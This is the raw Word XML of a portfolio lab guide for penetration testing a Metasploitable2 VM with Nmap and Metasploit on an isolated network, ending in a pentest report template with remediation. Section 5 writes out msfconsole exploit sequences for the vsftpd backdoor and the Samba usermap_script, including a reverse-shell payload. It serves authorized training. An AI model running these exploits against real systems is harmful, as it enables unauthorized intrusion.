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2937"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing with Metasploit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A Hands-On Lab Project for Authorized, Isolated Environments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Portfolio / Training Project — Metasploitable2 Lab Environment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Legal &amp; Ethical Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="B91C1C" w:sz="8"/>
          <w:bottom w:val="single" w:color="B91C1C" w:sz="8"/>
          <w:left w:val="single" w:color="B91C1C" w:sz="8"/>
          <w:right w:val="single" w:color="B91C1C" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FEF2F2" w:val="clear"/>
        <w:spacing w:after="150" w:before="150"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">This project is strictly for educational use in an isolated, self-owned lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">All techniques, commands, and scenarios described in this document must only be performed against systems you own or are explicitly authorized to test — such as Metasploitable2/3, DVWA, or other intentionally vulnerable VMs running on a private, host-only (non-internet-facing)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 NOT run any of these techniques against production systems, third-party networks, or any system you do not own or have written authorization to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Unauthorized access to computer systems is illegal under laws such as the U.S. Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and equivalent legislation worldwide.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This document is intended to demonstrate skills for portfolio, training, and certification-preparation purposes (e.g., OSCP, PNPT, Security+ practical study).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author/reader assumes full responsibility for ensuring all testing occurs within a legally authorized and isolated scope.</w:t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pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective of this project is to demonstrate a complete, methodical penetration testing engagement against a deliberately vulnerable virtual machine, using Metasploit Framework as the primary exploitation platform. The project follows an industry-standard methodology: reconnaissance → scanning → vulnerability analysis → exploitation → post-exploitation → reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This simulates a real-world internal penetration test workflow while remaining entirely inside a personally-owned, isolated lab network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Scope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Scope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 VM (Metasploitable2) on host-only virtual network 192.168.56.0/24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host outside the isolated virtual network; any production/live/third-party system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Window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Self-paced lab exercise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Self-authorized — lab owned and operated entirely by the tester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Rules of Engagement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testing outside the host-only adapter; no internet-facing exposure of the target VM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1.3 Tools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Kali Linux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Attacker workstation — pre-loaded with pentest tooling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Metasploit Framework (msfconsole)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Exploitation and post-exploitation framework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Nmap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 discovery, port scanning, service/version enumeration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Metasploitable2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Intentionally vulnerable target VM (Linux-based)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VirtualBox / VMware Workstation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Hypervisor for building the isolated lab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Wireshark (optional)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Packet capture for traffic analysis/verification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1.4 Lab Architecture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Host Machine (Physical)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Kali Linux (Attacker VM)         Metasploitable2 (Target VM)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IP: 192.168.56.10        &lt;---&gt;   IP: 192.168.56.20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Host-Only Network (VirtualBox: vboxnet0)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No internet / NAT bridging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Attacker VM: Kali Linux, static IP on host-only adapter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Target VM: Metasploitable2, static IP on the same host-only adapter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Network: Host-only virtual switch — no route to the internet or physical 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Isolation control: Both VMs' network adapters set to "Host-Only Adapter" only (no NAT/Bridged adapter enabled during testing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1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Host machine with virtualization enabled in BIOS (Intel VT-x / AMD-V)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VirtualBox (or VMware Workstation/Player) installed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Kali Linux VM image (official .ova from kali.org)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Metasploitable2 VM image (official download, e.g., from SourceForge/Rapid7)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Minimum 8GB RAM host (4GB+ recommended to allocate across both VMs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Step-by-Step Lab Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Create an Isolated Host-Only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Open VirtualBox → File → Host Network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Create a new Host-Only adapter (e.g., vboxnet0)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Set the adapter's IPv4 address to 192.168.56.1, mask 255.255.255.0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Disable DHCP on this adapter (assign static IPs manually for predictability)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Import and Configure Kali Linux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Import the Kali .ova file: File → Import Appliance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Allocate resources (2 CPUs, 4GB RAM minimum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Go to VM Settings → Network → Adapter 1: attached to Host-only Adapter, name vboxnet0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Boot Kali, log in, and set a static IP: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sudo ip addr add 192.168.56.10/24 dev eth0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sudo ip link set eth0 up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(Or configure persistently via /etc/network/interfaces or NetworkManager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Import and Configure Metasploitable2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Extract the Metasploitable2 .vmdk/.ova and create a new VM in VirtualBox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Go to VM Settings → Network → Adapter 1: attached to Host-only Adapter, name vboxnet0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Boot the VM (default credentials: msfadmin / msfadmin — lab-only, never reuse)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Confirm/set static IP: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sudo ifconfig eth0 192.168.56.20 netmask 255.255.255.0 up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Verify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Confirm neither VM has a Bridged or NAT adapter enabled during active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Optionally disable the host machine's Wi-Fi/Ethernet while testing for an extra air-gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Connectivity Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From Kali: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ping -c 4 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected: successful ICMP replies, confirming attacker → target connectivity on the isolated segment.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sudo netdiscover -r 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirms both hosts are visible only on the private host-only subnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Reconnaissance &amp; Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Nmap Scanning Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Host Discovery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nmap -sn 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifies live hosts on the isolated subnet without port scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Full Port Scan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nmap -p- -T4 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Scans all 65,535 TCP ports to identify the full attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Service &amp; Version Detection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nmap -sV -sC -p &lt;open_ports&gt; 192.168.56.20 -oA metasploitable2_scan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-sV: version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-sC: default Nmap scripts (banner grabbing, basic enumeration)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-oA: saves output in all formats (normal, XML, grepable) for later import</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected findings on Metasploitable2 typically include open services such as: FTP (21 — vsftpd 2.3.4), SSH (22), Telnet (23), SMTP (25), DNS (53), HTTP (80), RPC (111), NetBIOS/Samba (139/445), MySQL (3306), and others — a deliberately broad, outdated attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Importing Scan Results into Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Metasploit's database and console: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sudo msfdb init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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside msfconsole: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db_status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db_nmap -sV -sC 192.168.56.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Or import a previously saved XML scan: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db_import metasploitable2_scan.xml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hosts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services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This populates Metasploit's internal database with hosts, ports, and services — allowing later modules to auto-populate RHOSTS and enabling correlation via services -p &lt;port&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Identifying Vulnerable Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From the services table in Metasploit (or the Nmap output), flag services with known, publicly-documented vulnerabilities. Example entries for Metasploitable2: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rPr>
          <w:tblHeader/>
        </w:trPr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Notable Weakness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vsftpd 2.3.4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Known backdoor vulnerability (CVE-2011-2523)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Samba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Vulnerable to known exploits (e.g., usermap_script)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6667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UnrealIRCd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Backdoored version (CVE-2010-2075)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3306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Weak/default credentials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Telnet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Unencrypted, weak default credentials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4.2 Matching Services to Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside msfconsole, search for relevant modules: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search vsftpd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search type:exploit platform:unix name:samba</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect a module before use: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use exploit/unix/ftp/vsftpd_234_backdoor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info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">info displays the module's description, required options (RHOSTS, RPORT), supported targets, references (CVE/EDB-ID), and disclosure date — critical for confirming applicability before attempting exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Exploitation Methodology (Conceptual Walkthrough)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Metasploit Workflow Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard exploitation flow inside msfconsole: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use &lt;module_path&gt;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show options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set RHOSTS 192.168.56.20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set RPORT &lt;port&gt;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set PAYLOAD &lt;payload_path&gt;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set LHOST 192.168.56.10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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 msfconsole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Exploits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that leverages a specific vulnerability to gain access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Payloads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delivered upon successful exploitation (e.g., a reverse shell, Meterpreter)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Auxiliary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Modules for scanning, fuzzing, DoS testing — no direct exploitation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Encoders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Obfuscate payloads to evade basic signature detection (lab/study context)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Modules run after a session is established (enumeration, privilege escalation)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connections to compromised hosts, manageable via sessions -i &lt;id&gt;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5.3 Documented Example Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scenario A — vsftpd 2.3.4 Backdoor (FTP, Port 21)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use exploit/unix/ftp/vsftpd_234_backdoor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set RHOSTS 192.168.56.20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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Concept: This specific vsftpd version contains a maliciously inserted backdoor triggered by a crafted login string, which opens a shell on port 6200. This is a textbook example of a supply-chain/backdoor vulnerability used for teaching detection and remediation awareness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scenario B — Samba usermap_script (Port 445/139)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use exploit/multi/samba/usermap_script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set RHOSTS 192.168.56.20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set PAYLOAD cmd/unix/reverse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set LHOST 192.168.56.10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exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Concept: Demonstrates a command-injection flaw in older Samba configurations, resulting in remote command execution — used here to illustrate improper input sanitization in legacy network services.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B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">Both scenarios are exercised solely against the Metasploitable2 target for training purposes and should never be attempted against unauthorized systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Session Handling (Meterpreter Basics — Conceptual)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a session is established: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EDEDED" w:val="clear"/>
        <w:spacing w:after="200" w:before="10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sessions -l          # list active sessions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sessions -i 1        # interact with session 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Meterpreter concepts (for study purposes):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sysinfo — gather target OS/architecture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getuid — confirm current privilege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ps / migrate — process listing and migration for stability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background — return to msfconsole without killing the session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Privilege Escalation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Enumerate for misconfigurations: writable /etc/passwd, SUID binaries, outdated kernel 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Metasploit's post/multi/recon/local_exploit_suggester can suggest applicable local privilege-escalation modules based on the target's enumerated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Conceptually, escalation exploits a secondary flaw (e.g., kernel exploit, misconfigured cron job) distinct from the initial foothold vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Evidence Gathering for Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">For each successful step, document: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Command executed and module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Screenshot of output (redact in real engagements if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Resulting access level (user vs. root/administrator)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Any files, credentials, or configuration evidence retrieved (hashes, config files) — used strictly to substantiate findings, never exfiltrated beyond the lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Professional Pentest Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="pag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Penetration Test Report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[Lab Project Name]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Brief, non-technical summary of testing objectives, high-level findings, and overall risk posture. Written for a management/non-technical audience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp;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Testing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In-scope systems (IP addresses / hostnames)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Methodology followed (e.g., PTES, OWASP, or custom lab methodology)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Tools used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Findings Summary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1200"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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 ID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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc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Affected Host/Service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vsftpd 2.3.4 Backdoor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192.168.56.20:21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Samba usermap_script RCE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192.168.56.20:445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Weak/Default Credentials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Multiple services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t xml:space="preserve">4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F-01: vsftpd 2.3.4 Backdoor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Description: [technical explanation]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Impact: Full remote command execution as root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Evidence: [screenshot placeholder]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CVSS Vector: [vector string]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Remediation: Upgrade vsftpd to a patched version; verify package integrity/checksums against vendor-published hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F-02: Samba usermap_script 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Description: [technical explanation]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Impact: Remote command execution via crafted username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Evidence: [screenshot placeholder]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CVSS Vector: [vector string]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Remediation: Patch Samba to a supported version; disable legacy usermap_script configuration option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the CVSS-based or qualitative (Critical/High/Medium/Low/Info) rating system used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Overall Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Prioritized list of fixes, grouped by effort and risk reduction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Appendix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Full Nmap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Full Metasploit console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Screenshot gallery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Risk Rating Guidance (Example)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CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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9.0–10.0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Unauthenticated RCE (vsftpd backdoor)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7.0–8.9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Authenticated RCE, weak credential exposure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4.0–6.9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disclosure, misconfig without direct RCE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0.1–3.9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Minor info leakage, verbose banners</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Deliverables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This project produces the following portfolio-ready artifacts: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Lab Setup Guide — Section 2 of this document (VM build + network isolation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Final Pentest Report — populated version of the Section 7 template, exported to Markdown or Word (.docx)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Command/Screenshot Log — supporting evidence appendix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This Project Document — serves as a portfolio showcase piece</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Lessons Learned / Skills Demonstrated (Portfolio Summary)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6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this section to summarize your experience for a resume, GitHub README, or LinkedIn portfolio post.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Skills Demonstrated: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Isolated virtual lab design and network segmentation (VirtualBox host-only networking)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Reconnaissance and enumeration methodology using Nmap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Vulnerability identification and CVE-mapping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Practical exploitation using Metasploit Framework (exploits, payloads, auxiliary modules)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Post-exploitation session management and privilege escalation concepts (Meterpreter)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Professional security report writing, including CVSS-based risk rating and remediation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Adherence to ethical, authorized testing practices and scope discipline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Example Resume Bullet:</w:t>
      </w:r>
    </w:p>
